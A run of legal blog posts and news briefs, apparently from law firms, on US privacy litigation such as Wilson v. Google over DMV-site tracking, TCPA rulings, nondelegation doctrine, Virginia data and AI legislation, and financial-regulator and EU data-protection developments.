WHEN GOOGLE FOLLOWS YOU TO THE DMV: Where Consent Gets Lost in the Traffic

Happy CIPA Sunday! What feels like a routine online interaction with your state could be something else entirely. Imagine for a moment that you’re renewing your disability parking placard online. It’s another government form to fill out from the comfort of your home. You input your personal information, including sensitive details about your disability, and click submit. You don’t realize that an invisible digital hand may reach through your screen (figuratively speaking), quietly collecting your most sensitive personal information. Isn’t that a scary thought? This isn’t the plot of the new season of Black Mirror (or is it?); it’s the allegation at the center of Wilson v. Google L.L.C., No. 24-cv-03176-EKL, 2025 U.S. Dist. LEXIS 55629 (N.D. Cal. Mar. 25, 2025).
Here, Plaintiff was just trying to renew her disability parking placard through California’s “MyDMV” portal when she allegedly fell victim to what her lawsuit describes as Google’s secret data collection. According to the Opinion, Plaintiff provided the DMV with her personal information, including disability information,” only to later discover that Google secretly used Google Analytics and DoubleClick embedded on the DMV’s website when she renewed her disability parking placard to collect her personal information unlawfully. Like millions of Americans, Plaintiff trusted that her interaction with a government agency would remain private. This information, Plaintiff alleges, was then used to generate revenue for its advertising and marketing business. If proven true, Google essentially eavesdropped on what should have been a private interaction between a citizen and her state government.
The following legal issues reveal the complex landscape of privacy law in America. Pliantiff’s lawsuit hinges on two critical privacy laws. First, the Driver’s Privacy Protection Act (“DPPA”) is a federal law designed to prevent unauthorized disclosure of personal information from DMV records. Second, the California Invasion of Privacy Act (“CIPA”) protects against “the substantive intrusion that occurs when private communications are intercepted by someone who does not have the right to access them.” Campbell v. Facebook, Inc., 951 F.3d 1106, 1118 (9th Cir. 2020). Initially, these laws weren’t crafted with the advancement of digital technology in mind. However, they’re now legal shields designed for a different era and being tested against surveillance technologies. Together, these laws create a safety net meant to protect our personal information, but are they strong enough to catch Big Tech’s increasingly sophisticated data collection methods?
Google’s defense strategy is smart and calculated to exploit procedural technicalities rather than addressing the fundamental privacy questions at stake. Their first move was to argue that the California DMV was a “required party” under Fed. R. Civ. P. 19. They asserted the entire case should be dismissed since the DMV couldn’t be joined (due to sovereign immunity). It’s a clever technical legal argument that, had it succeeded, could have created a precedent for tech companies to evade privacy lawsuits involving government websites. Judge Eumi K. Lee wasn’t buying it, though. She rejected Google’s argument, finding that dismissing Plaintiff’s claims outright “would be draconian, particularly because Plaintiff seeks other relief too—including damages.” Wilson, 2025 U.S. Dist. LEXIS 55629, at *7. The Court rightfully distinguished the case from Downing v. Globe Direct L.L.C., 806 F. Supp. 2d 461 (D. Mass. 2011), noting that, unlike in Downing, where a vendor was explicitly contracted to include advertising, Plaintiff had alleged that Google encourages website operators—including the DMV—to use Google’s tools to obtain personal information that Google uses for its own advertising business.
Conversely, regarding Plaintiff’s DPPA claim, Google had more success. The Court focused on a technical but crucial question: Did Google obtain Plaintiff’s personal information from a motor vehicle record? The Ninth Circuit had previously ruled in Andrews v. Sirius XM Radio Inc. that the DPPA does not apply when “the initial source of personal information is a record in the possession of an individual, rather than a state DMV.” Andrews v. Sirius XM Radio Inc., 932 F.3d 1253, 1260 (9th Cir. 2019). With this in mind, Judge Lee determined that because “the personal information that was allegedly transmitted to Google came from Plaintiff, it was not from a motor vehicle record.” Wilson, 2025 U.S. Dist. LEXIS 55629, at *11. This distinction creates a troubling loophole in privacy protection. Your data is protected when it sits in a DMV database, but it loses that protection when you’re transmitting it to the DMV. This is a seemingly minor distinction. Whether data was pulled from a DMV database or intercepted while being entered by a user made all the difference for Plaintiff’s DPPA claim, which was dismissed with leave to amend.
Isn’t this getting spicy? But here’s where the plot thickens. While Plaintiff’s DPPA claim stumbled, her state law claim under CIPA survived Google’s dismissal motion. Google had asserted it couldn’t be liable under CIPA because it was merely acting as a “vendor” for the DMV—an extension of the government website rather than a third-party eavesdropper. This is a fantastic assertion by Google’s defense team. Think of it as Google claiming to be the DMV’s trusted assistant rather than an uninvited guest at a private conversation. However, Judge Lee rejected this defense, noting that Plaintiff had sufficiently alleged that “Google intercepted and used her personal information for its own advertising services” and thus “did not act solely as an extension of the DMV.” Id. at *13. The Court further found that Plaintiff had adequately alleged Google acted “willfully” by detailing how Google “specifically designed” its tracking tools to gather information and “intentionally encourages” website operators to use its tools in ways that circumvent users’ privacy settings. Id. at *14. That kind of intentionality matters when pleading willfulness under CIPA.
In Google’s defense, Google tried to shield itself behind its terms of service, which allegedly prohibited websites from sharing personally identifiable information with Google. But Judge Lee noted that assertion created “a question of fact” that couldn’t be resolved at the pleading stage. Id. at *15. With this observation, the Court relied on Smith v. Google LLC, explaining that while “Google argues that judicially noticeable policy documents suggest that Google did not actually want to receive personally identifiable information and expressly prohibited developers from transmitting such data, this presents a question of fact that the Court cannot resolve at this stage.” Id. (quoting Smith v. Google, L.L.C., 735 F. Supp. 3d 1188, 1198 (N.D. Cal. 2024)). As a result, the message is clear…fine print in terms of service won’t necessarily provide legal cover for actual data collection practices if it occurs.
This case feels like déjà vu for privacy advocates because we’ve seen this before. Similar allegations were raised against LinkedIn in Jackson v. LinkedIn Corp., 744 F. Supp. 3d 986 (N.D. Cal. 2024). The parallels between these two cases are vastly similar, involving allegations that tech giants are harvesting sensitive data from DMV websites. Google even tried to use these similarities against Plaintiff, characterizing her allegations as “entirely boilerplate” and “almost identical to the same allegations” asserted against LinkedIn in the Jackson case. Wilson, 2025 U.S. Dist. LEXIS 55629, at *15. However, the Court rejected this argument too, noting that the similarity between the complaints does not render Plaintiff’s allegations conclusory, especially given that both cases challenge similar alleged conduct by two different advertising companies. Google tried to compare Byars v. Hot Topic, Inc., 656 F. Supp. 3d 1051 (C.D. Cal. 2023), where the Court criticized “copy-and-paste” privacy complaints filed in bulk. However, Judge Lee pushed back, emphasizing that, unlike in Byars, Plaintiff’s Complaint here includes “at least 48 paragraphs of detailed allegations specific to Google” and cannot be dismissed as generic boilerplate. Wilson, 2025 U.S. Dist. LEXIS 55629, at *16.
So what’s the takeaway? When you enter personal information into a government site, like renewing your vehicle registration or applying for a disability placard, it feels like a private exchange. But behind the screen, third-party tools might be collecting your data. It sounds like Black Mirror, but it’s essentially happening. It’s as if you’re filling out a paper form at the DMV counter, only to discover that a marketing executive is peering over your shoulder, taking notes on your personal information. The legal distinction between information stored in a government database and information you’re actively entering may seem arbitrary from a privacy perspective. But it creates a significant gap in legal protection.
As the case progresses, Plaintiff has been granted leave to amend her DPPA claim, and her CIPA claim will proceed. This case reminds us that data privacy isn’t just about keeping private things—well… private—it’s about controlling who knows what about us and how that information is used. With every click and keystroke, who else might be watching as you type?
As always,
Keep it legal, keep it smart, and stay ahead of the game.
Talk soon!

Privacy and Data Security in Community Associations: Navigating Risks and Compliance

Privacy and data security laws govern how organizations collect, handle, and protect personally identifiable information (PII) to ensure it is properly processed and protected.
For community associations, this is especially important as these organizations often manage large amounts of PII of homeowners and residents (e.g., name, address, phone number, etc.), including certain categories of sensitive PII, such as financial details. With identity theft and various cyber scams on the rise, cybercriminals frequently target this type of data. Once this data is accessed, a threat actor can do anything it wants with the data. For instance: the threat actor can sell the PII to the highest bidder; encrypt the data and hold it for ransom, meaning that a community association can no longer access the information and potentially must pay large sums in order to get it back; or make a copy of the PII and then extort the community association to return or delete the data instead of releasing it publicly, among other malicious acts. 
With these risks in mind, data security breaches have become a widespread concern, prompting legislative action. All fifty states now have laws requiring organizations to notify individuals if unauthorized access to PII occurs. These laws apply to community associations in North Carolina under North Carolina General Statute § 75-65. In order to avoid being involved in a data security breach, North Carolina community associations should prioritize taking steps to protect PII of their residents and homeowners.
While North Carolina does not offer specific statutory guidance for community associations regarding personal data handling, federal frameworks can help. The National Institute of Standards and Technology (NIST) has developed comprehensive privacy and cybersecurity guidelines. To view their resource and overview guide, visit this link. The NIST’s frameworks assist organizations in identifying the data they possess, protecting it, managing and governing it with clear internal rules, and responding to and recovering from data security incidents. To summarize some of the key steps necessary for a community association to protect its data, please see the list below.
Key Steps for Strengthening Privacy and Data Security

Keep Technology Updated. Community associations should prioritize keeping their systems, networks, and software up to date. Oftentimes, software updates include patches for security vulnerabilities that threat actors can exploit. As technology evolves, new threats emerge, and these software updates are designed to address these risks by closing security gaps. In addition, community associations should change passwords periodically and be sure that passwords are not universal among all systems and websites. If presented with the option, it is recommended to use multi-factor authentication on various log-in platforms. By using multi-factor authentication, there is an extra layer of security beyond a password that can be guessed, stolen, or compromised.
Manage Access. Ensure that only necessary employees have access to residents’ and homeowners’ PII. For those who have access, be sure to adequately train those employees to confirm they are apprised of the community associations’ cybersecurity policies and procedures. Additionally, be sure these employees can recognize common attack methods of threat actors and are able to avoid and report any suspicious activity. One of the basic ways to manage access is to ensure the community association is only collecting information that it absolutely needs to carry out its operations. If less data is in the possession of the community association, less data can be accessed by a threat actor.
Regularly Review Vendor Contracts. It’s crucial for community associations to audit contracts with vendors, at least annually, to ensure they align with the association’s risk tolerance. Many breaches stem from third-party service providers who have access to PII and sensitive PII. Without clear contractual safeguards, a breach could result in significant remediation costs, with limited legal recourse against the responsible vendor. Always be sure that your contracts address data protection and breach response obligations.
Consider Cyber Insurance. Cyber insurance has become an essential risk management tool for community associations. However, it’s important to understand that cyber insurance is not a catch-all solution. Insurers are increasingly raising premiums and limiting coverage for organizations that fail to implement strong data protection practices. Cyber insurance should be seen as a safety net, not a substitute for a comprehensive privacy and security strategy. Community associations should also periodically review their cyber insurance policies to confirm they are providing coverage for any new or emerging threats that may arise.
Engage the Community. Transparency, especially regarding the categories of data collected and how they are used, is key in building trust with residents and homeowners. Community Associations should seek input from their stakeholders on privacy and data security policies. While legal obligations will not change based on community sentiment, understanding residents’ concerns can help guide decision-making and foster a sense of accountability. Discussing data security efforts and proactively addressing cybersecurity challenges at an annual meeting provides an opportunity to clarify expectations and show the association’s commitment to protecting personal information.

For guidance on strengthening a community association’s privacy and data security efforts, contact us to learn more about best practices and compliance strategies.

Nondelegation and Environmental Law

Earlier this week, the Supreme Court held oral argument in Federal Communications Commission v. Consumers’ Research.1 The case addresses the Federal Communications Commission’s Universal Service Fund programs aimed at providing funding to connect certain customers with telecommunications services. The challengers contend that Congress ran afoul of the nondelegation doctrine in authorizing the FCC to setup the Universal Service Fund programs and that these programs are therefore unlawful.
Although that issue might appear far removed from issues of environmental law, the case could have significant ramifications and could curtail Congress’s ability to authorize federal administrative agencies to issue binding regulations. That curtailment could reach to congressional enactments that authorize the Environmental Protection Agency to promulgate regulations in a variety of areas, including several major environmental statutes like the Clean Air Act, the Clean Water Act, and the Safe Drinking Water Act, to name a few.
What is the Nondelegation Doctrine and Why is it Important?
The nondelegation doctrine holds that Congress may not delegate lawmaking (i.e., legislative) authority to executive branch agencies. As some observers have put it, however, the nondelegation doctrine had only one good year, in 1935, when the Supreme Court struck down two federal laws authorizing the executive to take certain actions that were considered legislative in nature. The cases were A.L.A. Schechter Poultry Corp. and Panama Refining Co.
Besides those two cases, the Supreme Court has not struck down any other federal laws on nondelegation grounds. This is because, after 1935, the Supreme Court adopted a relatively permissive test of whether a statute runs afoul of the nondelegation doctrine. The test, referred to as the “intelligible-principle” test, looks to whether Congress has provided the administrative agency with some “intelligible principle” to follow in promulgating regulations pursuant to a congressional enactment.
Applying the intelligible-principle test, the Supreme Court has repeatedly, and over approximately eight decades, upheld congressional delegations of rulemaking power to administrative agencies.
However, in 2019, a dissenting opinion written by Justice Gorsuch in Gundy v. United States, called on the Court to abandon the intelligible-principle test and instead move toward a test where the Agency is not able to make policy decisions and instead is left to a role where it only “fills up the details” or makes factual determinations. Notably, the Gundy dissent was joined by Justices Roberts and Thomas, and Justices Alito and Kavanaugh elsewhere expressed support for the Gundy dissent’s approach. Gundy was also decided before Justice Barrett joined the Court. This has Supreme Court watchers asking whether the Supreme Court might inject more stringency in the nondelegation test in an appropriate case.
Enter Consumers Research. This is the first Supreme Court case to squarely raise nondelegation issues since Gundy. The challengers to the Universal Service Fund program argue that Congress gave the FCC unchecked authority to raise funds to be directed toward the goal of providing universal service from telecommunications services providers. The FCC (and intervenors) respond that the program “passes . . . with flying colors” and fits comfortably within past nondelegation cases because of the numerous restrictions that the statute places on the FCC. If the Supreme Court were to shift course by establishing a more stringent nondelegation test, that could significantly constrain Congress’s ability to delegate rulemaking powers to administrative agencies. Importantly, a more stringent test for nondelegation challenges could also impact numerous existing federal laws. We discuss just a sample of environmental laws that could be affected in the following section.
What Could it Mean for Environmental Law, and You?
One of the most obvious areas where a more stringent delegation test could impact environmental law is in the setting of air and water quality standards.
For example, the Clean Air Act directs the EPA to set air quality standards that apply nationwide. The Clean Air Act provides relatively loose guidance on how the EPA should go about that task, directing the EPA to promulgate standards “requisite to protect the public health” while “allowing an adequate margin of safety.” The Supreme Court upheld that delegation in Whitman v. American Trucking Associations, Inc., but if the Supreme Court were to take a more stringent approach to nondelegation like that in the Gundy dissent, the EPA may not be able to make the decision of what air standard is “requisite to protect the public health” because that could be viewed as a key policy determination and more than “fill[ing] up the details.”
Likewise, in the Clean Water Act, the EPA is also directed to review water quality standards set by individual states, again taking into account a relatively broad instruction from Congress “to protect the public health or welfare, enhance the quality of water and serve the purposes of this chapter” while also considering the waters’ “use and value for public water supplies, propagation of fish and wildlife, recreational purposes, and agricultural, industrial, and other purposes, and . . . their use and value for navigation.” Again, a more stringent nondelegation test could find that these instructions leave the EPA with too much of a policy-making role.
Finally, in the Safe Drinking Water Act, the EPA is directed to set maximum contaminant level goals “at the level at which no known or anticipated adverse effects on the health of persons occur and which allows an adequate margin of safety.” This direction to set a standard is potentially less at risk because it requires more fact finding (i.e., determining “known or anticipated adverse effects on” health), but the requirement to determine an “adequate” safety margin might be deemed to be too close to policymaking.
Although nondelegation challenges to these types of environmental regulations have been raised in the past, they have failed at least in part because of the relaxed intelligible-principle test. The outcome in Consumers’ Research could change that. The Environmental Team at Womble Bond Dickinson are well-suited to evaluate these specific questions of law with you.
Counting Noses in Consumers’ Research
For now, it appears that the current nondelegation test will live to see another day. Only Justices Thomas, Alito, and Gorsuch seemed readily willing to make the test more stringent. The Justices appointed by Democratic presidents (Sotomayor, Kagan, and Jackson) are sure “no” votes. As for the three Justices typically left in the middle, Chief Justice Roberts was unusually quiet during argument, while both Justices Kavanaugh and Barrett pushed back on counsel for Consumers’ Research in numerous instances. Given that the Universal Service Fund program enjoys continuing and broad bipartisan support, this may not be the case where any of the middle three Justices are willing to take on the nondelegation issue, especially after the Court has already issued decisions that reign in administrative agency authority through the major-questions doctrine and by overruling the Chevron deference regime.
Regardless, the Supreme Court’s opinion, which should issue by July 2025, will likely reveal where the Court is headed on nondelegation issues and could signal that a more searching nondelegation test is on the horizon. 

1 Brief disclaimer: Michael Miller worked on this case in the earlier stages of litigation before it was brought before the Supreme Court. This update does not share any views on the merits of the case.

Virginia Enacts Law Protecting Reproductive and Sexual Health Data

On March 24, 2025, Virginia Governor Youngkin signed into law S.B. 754, which amends the Virginia Consumer Protection Data Act (“VCDPA”) to prohibit the collection, disclosure, sale or dissemination of consumers’ reproductive or sexual health data without consent.
The law defines “reproductive or sexual health information” as “information relating to the past, present, or future reproductive or sexual health” of a Virginia consumer, including:

Efforts to research or obtain reproductive or sexual health information services or supplies, including location information that may indicate an attempt to acquire such services or supplies;
Reproductive or sexual health conditions, status, diseases, or diagnoses, including pregnancy, menstruation, ovulation, ability to conceive a pregnancy, whether an individual is sexually active, and whether an individual is engaging in unprotected sex;
Reproductive and sexual health-related surgeries and procedures, including termination of a pregnancy;
Use or purchase of contraceptives, birth control, or other medication related to reproductive health, including abortifacients;
Bodily functions, vital signs, measurements, or symptoms related to menstruation or pregnancy, including basal temperature, cramps, bodily discharge, or hormone levels;
Any information about diagnoses or diagnostic testing, treatment, or medications, or the use of any product or service relating to the matters described above; and
Any information described above that is derived or extrapolated from non-health-related information such as proxy, derivative, inferred, emergent, or algorithmic data.

“Reproductive or sexual health information” does not include protected health information under HIPAA, health records for the purposes of Title 32.1, or patient-identifying records for the purposes of 42 U.S.C. § 290dd-2.
These amendments to the VCDPA will take effect on July 1, 2025.

Virginia Governor Vetoes Rate Cap and AI Regulation Bills

On March 25, Virginia Governor Glenn Youngkin vetoed two bills that sought to impose new restrictions on “high-risk” artificial intelligence (AI) systems and fintech lending partnerships. The vetoes reflect the Governor’s continued emphasis on fostering innovation and economic growth over introducing new regulatory burdens.
AI Bias Bill (HB 2094)
The High-Risk Artificial Intelligence Developer and Deployer Act would have made Virginia the second state, after Colorado, to enact a comprehensive framework governing AI systems used in consequential decision-making. The proposed law applied to “high-risk” AI systems used in employment, lending, and housing, among other fields, requiring developers and deployers of such systems to implement safeguards to prevent algorithmic discrimination and provide transparency around how automated decisions were made.
The law also imposed specific obligations related to impact assessments, data governance, and public disclosures. In vetoing the bill, Governor Youngkin argued that its compliance demands would disproportionately burden smaller companies and startups and could slow AI-driven economic growth in the state.
Fintech Lending Bill (SB1252)
Senate Bill 1252 targeted rate exportation practices by applying Virginia’s 12% usury cap to certain fintech-bank partnerships. Specifically, the bill sought to prohibit entities from structuring transactions in a way that evades state interest rate limits, including through “rent-a-bank” models, personal property sale-leaseback arrangements, and cash rebate financing schemes.
Additionally, the bill proposed broad definitions for “loan” and “making a loan” that could have reached a wide array of service providers. A “loan” was defined to include any recourse or nonrecourse extension of money or credit, whether open-end or closed-end. “Making a loan” encompassed advancing, offering, or committing to advance funds to a borrower. In vetoing the measure, Governor Youngkin similarly emphasized its potential to discourage innovation and investment across Virginia’s consumer credit markets.
Putting It Into Practice: The vetoes of the High-Risk Artificial Intelligence Developer and Deployer Act (previously discussed here) and the Fintech Lending Bill signal Virginia’s preference for a more flexible, innovation friendly-oversight. This development aligns with a broader pullback from federal agencies with respect to oversight of fintech and related emerging technologies (previously discussed here and here). Fintechs and consumer finance companies leveraging AI should continue to monitor what has become a rapidly evolving regulatory landscape.
Listen to this post 

A TALE OF TWO REJECTED MOTIONS: Court Denies Plaintiff’s Motion for Leave to Amend and Defendant’s Motion to Compel

Hey, TCPAWorld!
Be timely. Don’t skip procedural steps. And always bring receipts.
In SHANAHAN v. MFS SUPPLY LLC, No. 8:23CV475, 2025 WL 885265 (D. Neb. Mar. 21, 2025), both Terrence Shanahan (“Plaintiff”) and MFS Supply LLC, (“Defendant”) filed competing motions. Plaintiff filed a Motion for Leave to Modify the First Amended Class Action Complaint and Case Progression Order, aiming to revise the class definition based on new facts uncovered during discovery. Meanwhile, the Defendant filed a Motion to Compel, to Deem Admissions Admitted, and to Enlarge the Number of Interrogatories, requesting the Court to force Plaintiff to respond to discovery requests.
The Court denied both motions.
Background
On October 27, 2023, Plaintiff filed a class action complaint accusing Defendant of sending unsolicited telemarketing texts to consumers on the national Do Not Call Registry (DNC). Plaintiff claims he received two such texts promoting real estate lockboxes and asserts he never gave consent, with his number registered on the DNC since December 17, 2004.
Plaintiff seeks to represent the following class:
“All persons in the United States who: (1) from the last 4 years to present (2) Defendant texted more than once in a 12-month period (3) whose telephone numbers were registered on the Federal Do Not Call registry for more than 30 days at the time the texts were sent.” (Filing No. 1 at p. 4 ). Plaintiff’s Complaint contains one cause of action for violations of 47 U.S.C. § 227(c) by telemarketing to telephone numbers listed on the Federal Government’s National Do Not Call Registry.”

Id. at *2. Plaintiff asserts a single cause of action, alleging that the Defendant violated 47 U.S.C. § 227(c) by making telemarketing calls to phone numbers registered on the National Do Not Call Registry.
Defendant filed an answer broadly denying Plaintiff’s allegations and asserting multiple affirmative defenses, including statutory exclusions and claims that Plaintiff and the putative class consented—either expressly or implicitly—to receiving the messages, among others.
Following the parties’ Rule 26(f) Report, the Court set June 24, 2024, as the deadline for written discovery and July 8, 2024, as the deadline to file a motion to compel. The Case Progression Order required parties to first contact the magistrate judge and receive authorization from the Court before filing a motion to compel.
Discovery
On February 7, 2024, Defendant served discovery requests and later deposed Plaintiff on May 6, revealing new information allegedly not disclosed in prior cases, including that Plaintiff’s phone number was tied to his real estate license and business since 2006. Then on May 8, 2024, Defendant served a second set of discovery requests, which Plaintiff largely objected to as exceeding the interrogatory limit under Rule 33(a), being irrelevant, burdensome, vague, ambiguous, among other objections. After receiving Plaintiff’s responses, the parties engaged in an exchange that would entertain—or agitate—any litigator, and according to the Court, went something like this:
Defense counsel: “These are late.”
Plaintiff’s counsel: “No they’re not.”
Defense counsel: “The admissions were due on the 7th. You are late on the admissions. The remainder of the responses are woefully inadequate…”
Plaintiff’s counsel: “Thank you for your professional courtesy in waiting one day. The requests were all overly broad.”
Defense counsel: No response.

Id. at * 2-3.
Counsel informed the Court of a dispute over whether Plaintiff should be allowed to conduct class discovery, and shortly before the conference, Plaintiff moved to amend the Complaint. During the June 17, 2024, conference, the Court directed Plaintiff to file an amended motion after finding no good cause for missing the amendment deadline under Rule 16(b). Further, the Court declined to grant class discovery or allow a motion to compel, instead directing the parties to resolve the issues through further meet-and-confer efforts.
On June 26, 2024, Plaintiff filed an amended motion to amend the complaint, seeking to revise the class definition and establish standing based on information learned during Defendant’s deposition which revealed that Defendant had sent approximately 34,000 text messages to a nationwide list that included Plaintiff. Plaintiff sought to add the following allegations to his Complaint:
“Defendant obtained Plaintiff’s information when it downloaded a nationwide list of 17,000 (Seventeen Thousand) Berkshire Hathaway Ambassador real estate agents. Plaintiff was unaware and had no knowledge that Defendant obtained Plaintiff’s information. Defendant uploaded the list to Textedly, a text messaging platform, and sent out two text messages soliciting one of its popular products (lockboxes, which are locked boxes for keys that realtors share).
Plaintiff’s phone number ending in 1146 is Plaintiff’s only residential phone number, and Plaintiff does not have a ‘landline.’
Plaintiff’s phone number ending in 1146 is his personal cell phone.
Plaintiff owns a real estate business and maintains four separate phone numbers ending in 6224, 0737, 6430 and 0366 for operational purposes so that people do not call his personal cell phone for matters dealing with routine operation of the business.”

Id. at *3. Plaintiff also sought to amend the class definition as:
“All persons in the United States who: (1) are on the list of Berkshire Hathaway Realtors obtained by MFS Supply LLC; (2) whose telephone numbers were connected to cell phones; (3) registered on the Federal Do Not Call registry; (4) whose owners do not maintain any other residential telephone numbers; and (5) do have separate telephone number(s) for business purposes.”

Id. On July 8, 2024, Defendant filed a Motion to Compel, seeking additional interrogatories and to deem admissions admitted, alleging that Plaintiff’s counsel failed to provide documents, respond to interrogatories, or meet discovery deadlines.
Court’s Analysis of the Competing Motions
The Court starts with analyzing Plaintiff’s Motion to Amend his Complaint.
Under Rule 15(a), courts should freely grant leave to amend when justice requires, but if a scheduling deadline has passed, the party must first show good cause under Rule 16(b). Because Plaintiff filed his motion to amend more than three months after the March 15, 2024 deadline set in the Court’s scheduling order, he must first show good cause.
The primary measure of good cause is the movant’s diligence in trying to meet the deadline. Courts generally do not consider prejudice if the movant was not diligent, and absent newly discovered facts or changed circumstances, delay alone is insufficient to justify amendment. The Court found Plaintiff lacked good cause, finding that the facts were not newly discovered and could have been included earlier with diligence, nor did they alter the legal basis of Plaintiff’s claims which already addressed unsolicited texts sent despite being on the Do Not Call Registry. The Court also stated that granting the amendment after discovery had closed would cause delay, require further discovery, and unfairly prejudice Defendant.
Next, the Court analyzed Defendant’s Motion to Compel.
The Court denied Defendant’s motion for failing to follow procedural requirements, including not requesting a conference with the magistrate judge as required by the Case Progression Order and Civil Case Management Practices. Defendant also failed to show proof of a proper meet and confer, such as the date, time, or attachments any related communications between the parties. Plaintiff, on the other hand, submitted email evidence demonstrating that his counsel requested to meet and confer to resolve discovery issues, however, Defendant ignored the request and instead focused on filing the instant motion.
Moreover, the Court found that even if Defendant’s procedural failures were excused, the motion to compel still lacked the required evidentiary support to challenge Plaintiff’s production or objections, as local rules require supporting evidence for motions relying on facts outside the pleadings.
Specifically, the Court denied Defendant’s request for Plaintiff to respond to its second set of interrogatories, because Defendant exceeded the 25-interrogatory limit under Rule 33(a)(1) and failed to address the merits of Plaintiff’s objections or provide the original set of interrogatories.
Defendant’s request for production was denied as Defendant did not identify which of the 29 requests were deficient or explain why Plaintiff’s objections were invalid.
Finally, the Court denied the requests for admissions. Although Plaintiff’s responses were three days late, the Court, in its discretion, treated them as a request to withdraw deemed admissions and accepted them, finding no prejudice to Defendant and no impact on the merits of the case.
Takeaways
Scheduling Orders are not mere suggestions made by the Court and parties are expected to follow them. While the Court has the discretion to approve untimely requests to amend, the movant must show good cause under Rule 16(b), supported by diligence and not rely on preexisting facts that could have been included earlier.
Further, skipping procedural steps, such as a meet-and-confer, can kill your motion before its merits are weighed.
Finally, if you’re challenging discovery responses, make sure to bring receipts. Courts want precision—not general statements.

FDIC Aims to Eliminate Reputational Risk from Supervision

On March 24, acting FDIC Chairman Travis Hill informed Congress that the agency is preparing to eliminate the use of “reputation risk” as a basis for supervisory criticism. In a letter to Rep. Dan Meuser (R-Pa.), Hill explained that the FDIC has completed a review of its regulations, guidance, and examination procedures to identify and remove references to reputational concerns in its supervisory framework.
Hill stated that the FDIC will propose a rule that ensures bank examiners do not issue supervisory findings based solely on reputational factors, which have faced criticism from lawmakers who argue the concept has been used to discourage banking relationships with lawful but politically sensitive industries.
The FDIC is also reevaluating its oversight of digital asset activities. According to Hill, the agency intends to replace a 2022 policy requiring FDIC-supervised institutions to notify the agency and obtain supervisory feedback before engaging in crypto-related activities. The new approach will aim to provide a clearer framework for banks to engage in blockchain and digital asset operations, so long as they maintain sound risk management practices. Hill noted that the FDIC is coordinating with the Treasury Department and other federal bodies to develop this updated framework.
Putting It Into Practice: This initiative closely mirrors the OCC’s recent decision to eliminate reputational risk as a factor in bank supervision (previously discussed here). Both agencies appear to be responding to criticism that reputational concerns have been used to discourage banking relationships with lawful but disfavored industries. Banks should prepare for changes in examination procedures and evaluate how these developments may impact their compliance strategies.
Listen to this post

SEC Creates New Tech-Focused Enforcement Team

On February 20, the SEC announced the creation of its Cyber and Emerging Technologies Unit (CETU) to address misconduct involving new technologies and strengthen protections for retail investors. The CETU replaces the SEC’s former Crypto Assets and Cyber Unit and will be led by SEC enforcement veteran Laura D’Allaird.
According to the SEC, the CETU will focus on rooting out fraud that leverages emerging technologies, including artificial intelligence and blockchain, and will coordinate closely with the Crypto Task Force established earlier this year (previously discussed here). The unit is comprised of approximately 30 attorneys and specialists across multiple SEC offices and will target conduct that misuses technological innovation to harm investors and undermine market confidence.
The CETU will prioritize enforcement in the following areas:

Fraud involving the use of artificial intelligence or machine learning;
Use of social media, the dark web, or deceptive websites to commit fraud;
Hacking to access material nonpublic information for unlawful trading;
Takeovers of retail investor brokerage accounts;
Fraud involving blockchain technology and crypto assets;
Regulated entities’ noncompliance with cybersecurity rules and regulations; and
Misleading disclosures by public companies related to cybersecurity risks.

In announcing the CETU, Acting Chairman Mark Uyeda emphasized that the unit is designed to align investor protection with market innovation. The move signals a recalibration of the SEC’s enforcement strategy in the cyber and fintech space, with a stronger focus on misconduct that directly affects retail investors.
Putting It Into Practice: Formation of the CETU follows Commissioner Peirce’s statement on creating a regulatory environment that fosters innovation and “excludes liars, cheaters, and scammers” (previously discussed here). The CETU is intended to reflect that approach, redirecting enforcement resources toward clearly fraudulent conduct involving emerging technologies like AI and blockchain.
Listen to the Post 

FDA Announces a “Chemical Contaminants Transparency Tool” to Evaluate Potential Health Risks of Contaminants in Human Foods.

On March 20, 2025, the Food and Drug Administration (FDA) announced the availability of a Chemical Contaminants Transparency Tool, a database intended to provide users with a list of contaminant levels in the food supply.
Contaminant levels, such as tolerances, action levels, and guidance levels, are used by FDA to evaluate potential health risks in food.  If contaminant levels exceed the permissible threshold, FDA will deem the food to be unsafe.
The database compiles existing information from several sources, including compliance policy guides, guidance for industry, and the Code of Federal Regulations, into a single reference.  Information includes the contaminant’s name, commodity, contaminant level type, level value, and its reference source.  There are currently 301 records available on the database.
According to the news release, under the direction of Secretary Kennedy, the Chemical Contaminants Transparency Tool is one new initiative intended to modernize chemical safety.  The intention behind the database is to offer the American public “informed consent about what they are eating.”

HUGE WIN FOR LENDING TREE!: Court Holds Tree is Not Responsible for Affiliate Calls in Pay Per Call Program And That’s Huge News

So Tree and I have buried the hatchet and are friends again– in fact, Lending Tree will be speaking at Law Conference of Champions III, how awesome is that!
But the BEST way to get on the Czar’s good side is to deliver huge industry-helping TCPA wins, and that is EXACTLY what Tree just did and I LOVE TO SEE IT.
In Sapan v. LendingTree, 8:23-cv-00071 (C.D. Cal March 18, 2025) the Court just entered judgment in favor of Tree finding it cannot be held responsible for calls made by affiliates in its pay per call program. Absolutely MASSIVE win,
The ruling turned on vicarious liability principles and applied the critical case of Jones v. Royal Administration Services, Inc., 887 F.3d 443 (9th Cir. 2018), which is the primary Ninth Circuit authority on the issue.
Under Jones a party must control the injury-causing conduct to be liable for calls. And where a party is making calls that may be transferred to any number of buyers the party that happens to buy that call simply cannot be held liable for the transfer.
In light of that authority the Sapan found Tree was not liable because it did not directly control the caller and the mere fact it accepted a transfer is not dispositive.
Excellent result– and undoubtedly the correct one!
This is an important ruling for folks to keep in mind. A ton of litigation arises following lead gen third-party transfers and folks buying leads on non-exclusive campaigns should be citing this case!

Coming Soon: Coordinated Pan-European Enforcement of the ‘Right to Erasure’

The European Data Protection Board (EDPB) recently announced the launch of its 2025 Coordinated Enforcement Framework (CEF) action, which will focus on the right to erasure, also known as the “right to be forgotten,” or, in the United States, the “right to delete.”
This initiative marks a significant shift in enforcement priorities for Europe’s Data Protection Authorities (DPAs) and reflects an increased focus on ensuring compliance with Article 17 of the General Data Protection Regulation (GDPR), which grants individuals the right to have their personal data deleted in certain situations.

Quick Hits

EDPB’s 2025 Enforcement Focus: The CEF will prioritize enforcement of the right to erasure under Article 17 of the GDPR and involve coordination among thirty-two DPAs across Europe.
Increased Scrutiny of Compliance: Organizations may face increased information requests, investigations, and follow-up actions to evaluate their erasure practices and identify compliance gaps.
Preparing for Enforcement: Organizations will likely want to review and refine their erasure request processes to ensure timely responses, proper application of exceptions, and effective data deletion across all systems, including backup systems, and also review their broader GDPR compliance framework to mitigate possible risk in the event of a broader request for information.

